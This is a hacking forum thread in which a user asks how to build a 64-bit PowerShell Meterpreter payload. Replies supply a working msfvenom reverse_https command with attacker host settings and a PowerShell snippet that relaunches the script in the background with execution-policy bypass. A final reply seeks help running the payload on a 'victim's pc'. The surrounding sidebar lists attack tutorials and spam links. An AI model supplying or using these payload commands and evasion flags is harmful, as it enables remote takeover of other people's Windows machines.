Ok im using kali linux and i try to create a powershell x64 payload but its only creating x86 payloads.
I found a couple of tutorials searching google but they were not so clear.
If someone could help, i just want to create a powershell payload that would work on x64 computer.
Thanks and long live Null Byte.
Forum Thread: Powershell Payload Problem
- Hot
- Active
-
Forum Thread:
Bash and Chmod Command Fix
0
Replies
1 hr ago -
Forum Thread:
https://wellnesscarepills.com/thermo-keto-sculpt/
0
Replies
3 hrs ago -
Forum Thread:
https://wellnesscarepills.com/thermo-keto-sculpt/
0
Replies
4 hrs ago -
Forum Thread:
I'm Trying to Find a Friend That Suddenly Dissaperred online. Can Anyone Help Me Find Them?
0
Replies
4 hrs ago -
How to:
Install Metasploit Framework on Android | Part #3 - in UserLAnd
7
Replies
9 hrs ago -
Forum Thread:
TP-Link WN722N v2 on Linux 5.5.0 Not Working
3
Replies
10 hrs ago -
Forum Thread:
How We Can Set a reverse_tcp Payload for Android in Any Apk File?
1
Replies
11 hrs ago -
Forum Thread:
Perform Email Reconnaissance with Buster
1
Replies
11 hrs ago -
Forum Thread:
Help Me Remove a Photo from a Website
2
Replies
20 hrs ago -
Forum Thread:
How to Sms Bomber
10
Replies
20 hrs ago -
Forum Thread:
Is There Any Internal Wifi Card That Support Wireless Monitor Mode and Packet Injection?
1
Replies
21 hrs ago -
Forum Thread:
How to Crack Window Password with Kali Live Usb
17
Replies
2 days ago -
Forum Thread:
Why Am I Getting a Huge Assembly Dump from a Simple Hello World Program?
0
Replies
2 days ago -
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
5
Replies
2 days ago -
Forum Thread:
How we can configure (.OVPN) file created by Portmap.io in Kali Linux?
0
Replies
2 days ago -
Forum Thread:
Kali Linux External Wifi Not Working?
20
Replies
4 days ago -
Forum Thread:
Vitual Box External Wifi Adapter Connected but Still Kali Linux Say No Network Found ?
1
Replies
4 days ago -
Forum Thread:
Whenever I Try "Airmon-Ng Start wlan0" There's an Error?
14
Replies
4 days ago -
Forum Thread:
Tor Browser- Is It a VPN?
15
Replies
4 days ago -
Forum Thread:
Anonmously Send Sms
1
Replies
5 days ago
-
How To:
Python 2 vs. Python 3 — Important Differences Every Hacker Should Know
-
How To:
Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)
-
How To:
Find OSINT Data on License Plate Numbers with Skiptracer
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
Hack Like a Pro:
How to Hack Facebook (Facebook Password Extractor)
-
How To:
Hack Android Using Kali (Remotely)
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To:
Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & More
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To:
The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How to Hack Wi-Fi:
Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
-
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To:
Hack Wi-Fi Networks with Bettercap
-
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
-
How To:
Crack Shadow Hashes After Getting Root on a Linux System
-
How To:
Scan for Vulnerabilities on Any Website Using Nikto
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
14 Responses
Xorion2:
First, what exploit are you using the payload with?
Second, is Metasploit installed on a x86 system or x64?
OTW
I use the alphanumeric payload in setoolkit---powershell attack vector--- alphanumeric shellcode injector.
I use both nethunter on my nexus 5 and nexus 7(2013) and kali on my 64 bits laptop and i get the same problem on all the devices , its only creating x86 payloads.
I want to run the payload on my laptop but im sure a x86 payload won't do it.
To make it clear kali is in virtualbox on my 8.1 laptop and i want to run the payload on the windows side.
Can you show us a screenshot?
Thats a screenshot of the final process, i just black out my ip address.
As you can see im not asked to create a x64 payload it straight go and create a x86 one.
I believe there is only a x86 Powershell payload in Metasploit.
I think it would be a good project for you to create a x64 Powershell payload.
Thats what i was thinking, i will try to do that but i would need guidance on what needs to be modify in the script to make it work .
I don't know about making the payload work with what your trying to do with SET, but I can show you how to make a 64 bit powershell payload if you are interested.
That would be great.
How?
It has been a while since I discussed this, but in regards to computer science and not hacking, x64 has far more potential due to its backwards compatibility with x86 programs. I'm new to kali so I cannot offer advice on what to do besides switch to a 64 bit shell. There are probably people out there (Like the post above) who can make one though.
Ok, let me start by apologizing. I created a How To that would have explained this and so much more but never posted it. Anyways...
There are 64 bit payloads in metasploit and are located in the usr/share/metasploit-framework/modules/payloads directory. Just look for the x64 directory located in what ever payload type you are looking for (singles, stagers, stages).
However if you want to make a 32 bit payload work on a 64 bit windows machine with powershell you simply have to add the following IF statement to the very beginning of the script.
if ($env:Processor_Architecture -ne "x86")
{
&"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" –noexit -noninteractive -noprofile -file $myinvocation.Mycommand.path -executionpolicy bypass
exit
}
This statement tells the natively called powershell (32 bit powershell on 32 bit machines and 64 bit powershell on 64 bit machines) to check the processor architecture. If it is not 32 bit then it will call the 32 bit powershell located in the syswow64 directory with the following parameters.
-noexit (tells powershell not to exit once the script is executed)
-noninteractive (opens powershell in the background)
-noprofile (bypasses any profiles that may keep the script from executing)
-file $myinvocation.Mycommand.path (tells powershell what script called it so it can continue on with the payload)
-executionpolicy bypass (bypasses any execution policies that may keep the script from executing)
So to use this in an example we can create a powershell payload with msfvenom like this
root@Kali:~# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 -f psh -o /root/Desktop/powershell_win_met_https.ps1
Command explained:
msfvenom calls the program
-p specifies the payload to use
LHOST & LPORT sets the payloads options
-f specifies the output format
-o specifies were to save the payload
Then we just open the newly created file with any text editor and add the above IF statement to the very beginning.
Thanks a lot i will try that.
Thanks for that Dill.
Good and valuable info.
You are welcome, I hope it helps.
Hello! my problem is this when I run powershell payload on my virtual machine it works fine but when I execute this payload in someone pc and wait for starting the payload handler it does not start even the payload successfully ran in victim's pc please help
Share Your Thoughts